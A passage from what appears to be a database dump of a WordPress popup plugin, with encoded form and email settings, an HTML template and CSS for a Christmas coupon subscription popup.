Wx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjEiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO31pOjIyO2E6Nzp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjI6IjIyIjtzOjQ6Imh0bWwiO3M6ODoidGV4dGFyZWEiO3M6NToibGFiZWwiO3M6MjoiMjIiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIxIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9aTozMzthOjg6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czoyOiIzMyI7czo0OiJodG1sIjtzOjk6InNlbGVjdGJveCI7czo1OiJsYWJlbCI7czoyOiIzMyI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjEiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO3M6Nzoib3B0aW9ucyI7YToyOntpOjA7YToyOntzOjQ6Im5hbWUiO3M6NjoiYXNmYXNmIjtzOjU6ImxhYmVsIjtzOjM6InNhZiI7fWk6MTthOjI6e3M6NDoibmFtZSI7czo2OiJhc2Zhc2YiO3M6NToibGFiZWwiO3M6ODoiYXNmZGFzZGYiO319fWk6NTU7YTo3OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6MjoiNTUiO3M6NDoiaHRtbCI7czo4OiJjaGVja2JveCI7czo1OiJsYWJlbCI7czoyOiI1NSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjEiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO319czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MjA6InN1Yl90eHRfZXhpc3RzX2VtYWlsIjtzOjIzOiJFbXB0eSAgb3IgaW52YWxpZCBlbWFpbCI7czoxNjoic3ViX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6MzQ6IkNvbmZpcm0gc3Vic2NyaXB0aW9uIG9uIFtzaXRlbmFtZV0iO3M6MjU6InN1Yl90eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjE5NzoiWW91IHN1YnNjcmliZWQgb24gc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uIEZvbGxvdyA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+IHRvIGNvbXBsZXRlIHlvdXIgc3Vic2NyaXB0aW9uLiBJZiB5b3UgZGlkIG5vdCBzdWJzY3JpYmUgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoyNToic3ViX3JlZGlyZWN0X2VtYWlsX2V4aXN0cyI7czowOiIiO3M6MTM6InN1Yl9idG5fbGFiZWwiO3M6NzoiU2lnbiBVcCI7czoxMzoic3ViX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InN1Yl9uZXdfc3ViamVjdCI7czoyOToiTmV3IHN1YnNjcmliZXIgZm9yIFtzaXRlbmFtZV0iO3M6MTU6InN1Yl9uZXdfbWVzc2FnZSI7czoxMjk6IllvdSBoYXZlIG5ldyBzdWJzY3JpYmVyIG9uIHlvdXIgc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4sIGhlcmUgaXMgc3Vic2NyaWJlciBpbmZvcm1hdGlvbjo8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czo4OiJsb2dpbl9ieSI7czo4OiJ1c2VybmFtZSI7czoxODoibG9naW5fcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoxNToibG9naW5fYnRuX2xhYmVsIjtzOjEwOiLQm9C+0LPQuNC9IjtzOjIzOiJyZWdfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxMzoicmVnX2J0bl9sYWJlbCI7czo4OiJSZWdpc3RlciI7czoxMDoicmVnX2ZpZWxkcyI7YToyOntzOjQ6Im5hbWUiO2E6Nzp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6ItCY0LzRjyI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO31zOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fX1zOjIwOiJyZWdfdHh0X2NvbmZpcm1fc2VudCI7czoxOTU6ItCh0YHRi9C70LrQsCDQtNC70Y8g0L/QvtC00YLQstC10YDQttC00LXQvdC40Y8g0LHRi9C7INC+0YLQv9GA0LDQstC70LXQvdCwINC90LAg0LLQsNGIINCw0LTRgNC10YEg0Y3Qu9C10LrRgtGA0L7QvdC90L7QuSDQv9C+0YfRgtGLLiDQn9GA0L7QstC10YDRjNGC0LUg0LLQsNGI0YMg0Y3Qu9C10LrRgtGA0L7QvdC90YPRjiDQv9C+0YfRgtGDISI7czoxNToicmVnX3R4dF9zdWNjZXNzIjtzOjQzOiLQodC/0LDRgdC40LHQviDQt9CwINGA0LXQs9C40YHRgtGA0LDRhtC40Y4hIjtzOjIxOiJyZWdfdHh0X2ludmFsaWRfZW1haWwiO3M6NTg6ItCf0YPRgdGC0L7QuSDQuNC70Lgg0L3QtdC00LXQudGB0YLQstC40YLQtdC70YzQvdGL0LkgZW1haWwiO3M6MTY6InJlZ19yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjYxOiLQn9C+0LTRgtCy0LXRgNC00LjRgtC1INGA0LXQs9C40YHRgtGA0LDRhtC40Y4g0L3QsCBbc2l0ZW5hbWVdIjtzOjI1OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czozMzQ6ItCS0Ysg0LfQsNGA0LXQs9C40YHRgtGA0LjRgNC+0LLQsNC90Ysg0L3QsCDRgdCw0LnRgtC1IDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4g0KHQu9C10LTRg9C50YLQtSAgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiDQtNC70Y8g0LfQsNCy0LXRgNGI0LXQvdC40Y8g0YDQtdCz0LjRgdGC0YDQsNGG0LjQuC4g0JXRgdC70Lgg0LLRiyDQvdC1INC30LDRgNC10LPQuNGB0YLRgNC40YDQvtCy0LDQu9C40YHRjCDQt9C00LXRgdGMIC0g0L/RgNC+0YHRgtC+INC40LPQvdC+0YDQuNGA0YPQudGC0LUg0Y3RgtC+INGB0L7QvtCx0YnQtdC90LjQtS4iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6NDU6IltzaXRlbmFtZV0gINCS0LDRiCDQu9C+0LPQuNC9INC4INC/0LDRgNC+0LvRjCI7czoyODoicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NzE6ItCb0L7Qs9C40L06IFt1c2VyX2xvZ2luXTxiciAvPtCf0LDRgNC+0LvRjDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjEzOiJyZWdfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToicmVnX25ld19tZXNzYWdlIjtzOjE3Nzoi0KMg0LLQsNGBINC90L7QstGL0Lkg0L/QvtC70YzQt9C+0LLQsNGC0LXQu9GMINC90LAg0YHQsNC50YLQtSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4sINCy0L7RgiDQuNC90YTQvtGA0LzQsNGG0LjRjyDQv9C+0LvRjNC30L7QstCw0YLQtdC70Y86IDxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjtzOjEyOiJjb250YWN0X2Zvcm0iO3M6MjoiMjAiO3M6MTI6InN0YXRfZ2FfY29kZSI7czowOiIiO3M6NToidHh0XzAiO3M6MTM6IjxwPjUwJU9GRjwvcD4iO3M6NToidHh0XzEiO3M6Mzc6IjxwPkluc3RhbnTCoCBhY2Nlc3MgdG8gdGhlIGNvdXBvbjwvcD4iO3M6NToidHh0XzIiO3M6MTEwOiI8cD5CeSBjbGlja2luZyBcIlNpZ24gVXBcIiB5b3UgYWdyZWU8YnIgLz4gdG8gPGEgY2xhc3M9XCJwcHNUeHQzTGlua1wiIGhyZWY9XCIjXCI+VGVybXMgYW5kIENvbmRpdGlvbnM8L2E+PC9wPiI7fXM6MTA6Im9wdHNfYXR0cnMiO2E6Mjp7czo5OiJiZ19udW1iZXIiO3M6MToiNCI7czoxNjoidHh0X2Jsb2NrX251bWJlciI7czoxOiIzIjt9fQ==','<link href=\"https://fonts.googleapis.com/css?family=Alex+Brush|Josefin+Sans\" rel=\"stylesheet\">\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			<div class=\"ppsWrapTopImg\">\r\n				[if bg_type_1 == \"img\"]\r\n				<img src=\"[bg_img_1]\" class=\"ppsTopImg\"/>\r\n				[endif]\r\n			</div>\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n				<div class=\"ppsTxt1Separator\"></div>\r\n			[endif]\r\n			[if enb_txt_1]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_1 ppsPopupTxt_1\">\r\n				[txt_1]\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input class=\"butt\" type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			[if enb_txt_2]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_2 ppsPopupTxt_2\">\r\n				[txt_2]\r\n				</div>\r\n			[endif]\r\n			<div class=\"ppsTxt1Separator\"></div>\r\n			[if enb_foot_note]\r\n				<a href=\"#\" class=\"ppsFootNote ppsPopupClose\">\r\n				[foot_note]\r\n				</a>\r\n			[endif]\r\n			\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_sm]\r\n				<div style=\"clear: both;\"></div>\r\n				<div class=\"ppsSm\">\r\n				[sm_html]\r\n				</div>\r\n			[endif]\r\n			\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	font-family: arial;\r\n	font-size: 13px;\r\n	font-weight: normal;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n}\r\n\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: border-box;\r\n	-moz-box-sizing:    border-box;\r\n	box-sizing:         border-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n	[if bg_type_0 == \"color\"]\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\"{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\", endColorstr=\"[bg_color_0]\",GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \"img\"]\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n	\r\n	position: relative;\r\n	text-align: center;\r\n	padding: 0 0 40px;\r\n	[if bg_type_3 == \"color\"]\r\n	border: 3px solid [bg_color_3];\r\n	[endif]\r\n	\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell{\r\n    display: inline-block;\r\n    margin: 0;\r\n    width: 60%;\r\n	position: relative;\r\n	z-index: 100;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeForm input:first-child {\r\n	margin-top: 0px;\r\n}\r\n/*For all Elements*/\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"email\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"text\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n	-webkit-border-radius: 0px;\r\n	-moz-border-radius: 0px;\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 47px;\r\n	padding: 0;\r\n	margin: 10px 0;\r\n	display:block;\r\n	text-align: center;\r\n	color: #016823;\r\n	font-weight: normal;\r\n	font-size: 18px;\r\n	font-family: arial;\r\n	\r\n	[if bg_type_2 == \"color\"]\r\n	background: [bg_color_2];\r\n  	[elseif bg_type_2 == \"img\"]\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	margin: 0px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea { \r\n	height: auto;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  {\r\n	display:block;\r\n	margin: 10px 0 0;\r\n	color: #016823;\r\n	font-weight: normal;\r\n	font-size: 18px;\r\n	font-family: arial;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  span {\r\n	display: inline-block;\r\n	padding-right: 2px;\r\n	vertical-align: middle;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=radio],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=checkbox] {\r\n	vertical-align: middle;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email] {\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input::-webkit-input-placeholder { /* Chrome/Opera/Safari */\r\n    color: #016823;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input::-moz-placeholder { /* Firefox 19+ */\r\n    color: #016823;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell inpu:-ms-input-placeholder { /* IE 10+ */\r\n    color: #016823;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input:-moz-placeholder { /* Firefox 18- */\r\n    color: #016823;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	\r\n	width: 100%;\r\n	-webkit-border-radius: 0px;\r\n	-moz-border-radius: 0px;\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 47px;\r\n	padding: 0;\r\n	margin: 10px 0;\r\n	text-align: center;\r\n	font-family: arial;\r\n	\r\n  	color: #fff;\r\n  	cursor: pointer;\r\n	text-transform: none;\r\n	font-weight: 700;\r\n	font-size: 20px;\r\n	display: inline-block;\r\n	border: 1px solid transparent;\r\n	\r\n	background-color: #016823;\r\n    background-image: url(\"[PPS_ASSETS_URL]img/assets/365-2-right-arr.png\");\r\n    background-position: 90% center;\r\n    background-repeat: no-repeat;\r\n}\r\n#ppsPopupShell_[ID] .ppsWrapTopImg {\r\n	display: inline-block;\r\n    text-align: center;\r\n    width: 100%;\r\n}\r\n#ppsPopupShell_[ID] .ppsTopImg {\r\n	display: inline-block;\r\n	max-width: 70%;\r\n}\r\n\r\n\r\n\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	font-family: arial;\r\n	font-size: 35px;\r\n	padding: 20px 20px 0; \r\n	text-align: center;\r\n	line-height: 45px;\r\n	position: relative;\r\n	z-index: 100;\r\n	color: #333333;\r\n	word-wrap: break-word;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt {\r\n	font-family: arial;\r\n	margin: 0;\r\n	padding: 0;\r\n	text-align: center;\r\n	word-wrap: break-word;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt p {\r\n	display: inline-block;\r\n    margin: 0;\r\n    padding: 0;\r\n    width: 90%;\r\n	position: relative;\r\n	z-index: 100;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n    color: #f2362d;\r\n    font-size: 70px;\r\n    font-weight: bold;\r\n    line-height: 60px;\r\n    margin: 10px 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_1 {\r\n    color: #333333;\r\n    font-size: 18px;\r\n    padding: 10px 0;\r\n}\r\n\r\n\r\n#ppsPopupShell_[ID] .ppsPopupTxt_2 {\r\n	display: block;\r\n    font-size: 16px;\r\n    margin: 0 auto 15px;\r\n    text-align: center;\r\n    width: 90%;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_2 a {\r\n	color: #f44b44;\r\n	text-decoration: none;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_2 a:hover {\r\n	text-decoration: none;\r\n}\r\n\r\n\r\n#ppsPopupShell_[ID] .ppsTxt1Separator {\r\n	background-color: #cccccc;\r\n    display: block;\r\n    height: 1px;\r\n    margin: 0 auto;\r\n    width: 15%;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n	top: 15px;\r\n	z-index: 1000 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n    background: none !important;\r\n    border-bottom: 2px solid #016823;\r\n    color: #016823;\r\n    display: inline-block !important;\r\n    font-size: 16px;\r\n    height: auto !important;\r\n    margin: 10px 0;\r\n    position: static !important;\r\n    text-decoration: none;\r\n    top: 0 !important;\r\n    width: auto !important;\r\n	\r\n	word-wrap: break-word;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm{\r\n	margin-top:20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubMsg{\r\n	clear: both;\r\n  	text-align: center;\r\n}\r\n','christmas-2-prev.png',1,1,1,11,0,0,0,'2015-01-10 17:59:43',48,0),(49,'Let it Snow',1,0,'YTozOntzOjQ6Im1haW4iO2E6MzA6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjtzOjI0OiJoaWRlX2Zvcl91c2VyX3JvbGVzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjEwODp7czo1OiJ3aWR0aCI7czozOiI3MDAiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czozOiIwLjUiO3M6MTU6ImJnX292ZXJsYXlfdHlwZSI7czo1OiJjb2xvciI7czoxNjoiYmdfb3ZlcmxheV9jb2xvciI7czo0OiIjMDAwIjtzOjE0OiJiZ19vdmVybGF5X2ltZyI7czowOiIiO3M6MTg6ImJnX292ZXJsYXlfaW1nX3BvcyI7czo3OiJzdHJldGNoIjtzOjk6ImJnX3R5cGVfMCI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiI2ZmZmZmZiI7czo5OiJiZ190eXBlXzEiO3M6MzoiaW1nIjtzOjg6ImJnX2ltZ18xIjtzOjQ0OiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy8zNjUtMy10b3AtaW1nLnBuZyI7czoxMDoiYmdfY29sb3JfMSI7czo3OiIjM2QzZDNkIjtzOjk6ImJnX3R5cGVfMiI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMiI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzIiO3M6NzoiI2ZmZmZmZiI7czo5OiJiZ190eXBlXzMiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzMiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8zIjtzOjc6IiNmZmUwMDEiO3M6MTA6ImZvbnRfbGFiZWwiO3M6NzoiZGVmYXVsdCI7czoxNjoibGFiZWxfZm9udF9jb2xvciI7czo3OiIjZmZmZmZmIjtzOjEwOiJmb250X3R4dF8wIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8wIjtzOjc6IiNmZmZmZmYiO3M6MTE6ImZvbnRfZm9vdGVyIjtzOjc6ImRlZmF1bHQiO3M6MTc6ImZvb3Rlcl9mb250X2NvbG9yIjtzOjc6IiNjYmNiY2IiO3M6MTc6InJlaWRyZWN0X29uX2Nsb3NlIjtzOjA6IiI7czo5OiJjbG9zZV9idG4iO3M6MTE6ImNsYXNzeV9ncmV5IjtzOjc6ImJ1bGxldHMiO3M6ODoicG9wX2ljb24iO3M6MTE6ImxheWVyZWRfcG9zIjtzOjM6InRvcCI7czo1OiJsYWJlbCI7czoxMDoiU2F2ZSB1cCB0byI7czo5OiJlbmJfdHh0XzAiO3M6MToiMSI7czoxMzoiZW5iX2Zvb3Rfbm90ZSI7czoxOiIxIjtzOjk6ImZvb3Rfbm90ZSI7czozMjoiTm8sIHRoYW5rIHlvdS4gSeKAmW0gZ29vZCAgdG8gZ28iO3M6MTU6ImVuYl9zbV9mYWNlYm9vayI7czoxOiIxIjtzOjE3OiJlbmJfc21fZ29vZ2xlcGx1cyI7czoxOiIxIjtzOjE0OiJlbmJfc21fdHdpdHRlciI7czoxOiIxIjtzOjk6InNtX2Rlc2lnbiI7czo0OiJib3h5IjtzOjg6ImFuaW1fa2V5IjtzOjEwOiJzbGlkZV9kb3duIjtzOjEzOiJhbmltX2R1cmF0aW9uIjtzOjA6IiI7czoxMzoiZW5iX3N1YnNjcmliZSI7czoxOiIxIjtzOjg6InN1Yl9kZXN0IjtzOjk6IndvcmRwcmVzcyI7czoyMzoic3ViX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTk6InN1Yl9hd2ViZXJfbGlzdG5hbWUiO3M6MDoiIjtzOjIxOiJzdWJfYXdlYmVyX2FkdHJhY2tpbmciO3M6MDoiIjtzOjIxOiJzdWJfbWFpbGNoaW1wX2FwaV9rZXkiO3M6MDoiIjtzOjI1OiJzdWJfbWFpbGNoaW1wX2dyb3Vwc19mdWxsIjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXkiO3M6MDoiIjtzOjE2OiJzdWJfZ3JfY3ljbGVfZGF5IjtzOjE6IjAiO3M6MTM6InN1Yl9pY19hcHBfaWQiO3M6MDoiIjtzOjE1OiJzdWJfaWNfYXBwX3VzZXIiO3M6MDoiIjtzOjE1OiJzdWJfaWNfYXBwX3Bhc3MiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTM6InN1Yl9zZl9hcHBfaWQiO3M6MDoiIjtzOjE0OiJzdWJfY2tfYXBpX2tleSI7czowOiIiO3M6MTQ6InN1Yl9tZW1fYWNjX2lkIjtzOjA6IiI7czoxNToic3ViX21